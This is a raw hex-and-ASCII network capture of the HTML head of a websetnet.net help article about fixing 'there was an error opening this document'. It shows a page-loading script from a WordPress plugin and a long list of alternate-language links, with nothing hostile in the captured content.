                                                                                              2021-12-13 23:57:31 UTC8091INData Raw: 61 64 36 0d 0a 0a 3c 74 69 74 6c 65 3e 43 6f 72 72 65 c3 a7 c3 a3 6f 3a 20 4f 63 6f 72 72 65 75 20 75 6d 20 65 72 72 6f 20 61 6f 20 61 62 72 69 72 20 65 73 74 65 20 64 6f 63 75 6d 65 6e 74 6f 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 64 65 66 65 72 2d 63 73 73 22 3e 2e 6e 6f 2d 64 65 66 65 72 6a 73 20 2e 68 61 73 2d 66 61 6c 6c 62 61 63 6b 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 75 64 69 6f 2c 65 6d 62 65 64 2c 66 72 61 6d 65 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 70 69 63 74 75 72 65 2c 73 6f 75 72 63 65 2c 76 69 64 65 6f 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 2e 64 65 66 65 72 2d 6c 6f 61 64 65 64
                                                                                              Data Ascii: ad6<title>Correo: Ocorreu um erro ao abrir este documento</title><style id="defer-css">.no-deferjs .has-fallback{display:none!important}audio,embed,frame,iframe,img,picture,source,video{min-width:1px;min-height:1px;visibility:visible}.defer-loaded
                                                                                              2021-12-13 23:57:31 UTC8092INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 2c 6f 29 7b 66 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 65 3d 76 28 27 53 43 52 49 50 54 27 2c 74 2c 6f 29 29 2e 73 72 63 3d 6e 2c 68 28 65 29 7d 2c 65 29 7d 2c 66 2e 63 73 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 2c 6f 29 7b 66 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 65 3d 76 28 27 4c 49 4e 4b 27 2c 74 2c 6f 29 29 2e 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 2c 65 2e 68 72 65 66 3d 6e 2c 68 28 65 29 7d 2c 65 29 7d 2c 66 2e 64 6f 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 2c 6f 2c 69 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 6f 26 26 21 31 3d 3d 3d 6f 28 65 29 7c 7c 62 28 65 2c 74 29 7d 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 73 20 69 6e 20 63 26 26 6e 65 77 20 63 5b 73 5d 28 66
                                                                                              Data Ascii: function(n,t,e,o){f(function(e){(e=v('SCRIPT',t,o)).src=n,h(e)},e)},f.css=function(n,t,e,o){f(function(e){(e=v('LINK',t,o)).rel='stylesheet',e.href=n,h(e)},e)},f.dom=function(e,n,t,o,i){function r(e){o&&!1===o(e)||b(e,t)}f(function(t){t=s in c&&new c[s](f
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 2c 72 26 26 28 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 2e 71 75 65 72 79 53 65 0d 0a
                                                                                              Data Ascii: ,r&&(r(function(){[].slice.call(a.querySe
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 31 31 65 0d 0a 6c 65 63 74 6f 72 41 6c 6c 28 27 73 74 79 6c 65 5b 64 65 66 65 72 5d 27 29 29 2e 66 6f 72 45 61 63 68 28 72 2e 72 65 76 65 61 6c 29 7d 2c 74 29 2c 72 2e 64 6f 6d 28 27 2e 64 65 66 65 72 2d 6c 6f 61 64 69 6e 67 3a 6e 6f 74 28 5b 64 61 74 61 2d 69 67 6e 6f 72 65 5d 29 27 2c 74 2c 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 28 65 2c 27 64 65 66 65 72 2d 6c 6f 61 64 69 6e 67 27 2c 27 64 65 66 65 72 2d 6c 6f 61 64 65 64 27 29 7d 2c 64 29 2c 6f 2e 6c 6f 67 26 26 6f 2e 6c 6f 67 28 5b 27 4f 70 74 69 6d 69 7a 65 64 20 62 79 20 64 65 66 65 72 2e 70 68 70 5c 6e 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 70 6c 75 67 69 6e 73 2f 73 68 69 6e 73 2d 70 61 67 65 6c 6f 61 64 2d 6d 61 67 69 63 2f 27 5d 2e 6a 6f 69 6e 28 27 5c 6e 27 29
                                                                                              Data Ascii: 11electorAll('style[defer]')).forEach(r.reveal)},t),r.dom('.defer-loading:not([data-ignore])',t,0,function(e){l(e,'defer-loading','defer-loaded')},d),o.log&&o.log(['Optimized by defer.php\nhttps://wordpress.org/plugins/shins-pageload-magic/'].join('\n')
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 36 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 6f<link rel="alternate" hreflang="en" href="https://websetnet.net/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 61 66 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 61 66 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="af" href="https://websetnet.net/af/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 73 71 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 73 71 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="sq" href="https://websetnet.net/sq/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8094INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 61 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 61 6d 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="am" href="https://websetnet.net/am/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 61 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 61 72 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="ar" href="https://websetnet.net/ar/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 79 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 68 79 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="hy" href="https://websetnet.net/hy/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 61 7a 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 61 7a 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="az" href="https://websetnet.net/az/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 75 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 65 75 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="eu" href="https://websetnet.net/eu/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 37 33 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 62 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 62 65 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 0d 0a
                                                                                              Data Ascii: 73<link rel="alternate" hreflang="be" href="https://websetnet.net/be/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 62 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 62 6e 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="bn" href="https://websetnet.net/bn/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 62 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 62 73 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="bs" href="https://websetnet.net/bs/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8095INData Raw: 61 36 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 62 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 62 67 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 63 61 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 63 61 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65
                                                                                              Data Ascii: a62<link rel="alternate" hreflang="bg" href="https://websetnet.net/bg/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="ca" href="https://websetnet.net/ca/fix-there-was-an-error-opening-this-document/"><link rel="alternate
                                                                                              2021-12-13 23:57:31 UTC8097INData Raw: 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 65 74 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 74 6c 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e
                                                                                              Data Ascii: rror-opening-this-document/"><link rel="alternate" hreflang="et" href="https://websetnet.net/et/fix-there-was-an-error-opening-this-document/"><link rel="alternate" hreflang="tl" href="https://websetnet.net/tl/fix-there-was-an-error-opening-this-documen
                                                                                              2021-12-13 23:57:31 UTC8098INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8098INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 61 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 68 61 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="ha" href="https://websetnet.net/ha/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8098INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8098INData Raw: 37 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 61 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 68 61 77 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 0d 0a
                                                                                              Data Ascii: 75<link rel="alternate" hreflang="haw" href="https://websetnet.net/haw/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8098INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 69 77 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="he" href="https://websetnet.net/iw/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8098INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8098INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 68 69 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="hi" href="https://websetnet.net/hi/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 34 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 6d 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 68 6d 6e 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 74<link rel="alternate" hreflang="hmn" href="https://websetnet.net/hmn/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 68 75 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 68 75 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="hu" href="https://websetnet.net/hu/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 69 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 69 73 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="is" href="https://websetnet.net/is/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 69 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 69 67 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="ig" href="https://websetnet.net/ig/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 69 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 69 64 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="id" href="https://websetnet.net/id/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 67 61 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 67 61 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="ga" href="https://websetnet.net/ga/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 69 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 69 74 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="it" href="https://websetnet.net/it/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8099INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6a 61 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 6a 61 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="ja" href="https://websetnet.net/ja/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8100INData Raw: 31 0d 0a 0a 0d 0a
                                                                                              Data Ascii: 1
                                                                                              2021-12-13 23:57:31 UTC8100INData Raw: 37 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6a 76 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 6a 77 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0d 0a
                                                                                              Data Ascii: 72<link rel="alternate" hreflang="jv" href="https://websetnet.net/jw/fix-there-was-an-error-opening-this-document/">
                                                                                              2021-12-13 23:57:31 UTC8100INData Raw: 37 34 0d 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 6b 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 73 65 74 6e 65 74 2e 6e 65 74 2f 6b 6e 2f 66 69 78 2d 74 68 65 72 65 2d 77 61 73 2d 61 6e 2d 65 72 72 6f 72 2d 6f 70 65 6e 69 6e 67 2d 74 68 69 73 2d 64 6f 63 75 6d 65 6e 74 2f 22 3e 0a 0d 0a
                                                                                              Data Ascii: 74<link rel="alternate" hreflang="kn" href="https://websetnet.net/kn/fix-there-was-an-error-opening-this-document/">
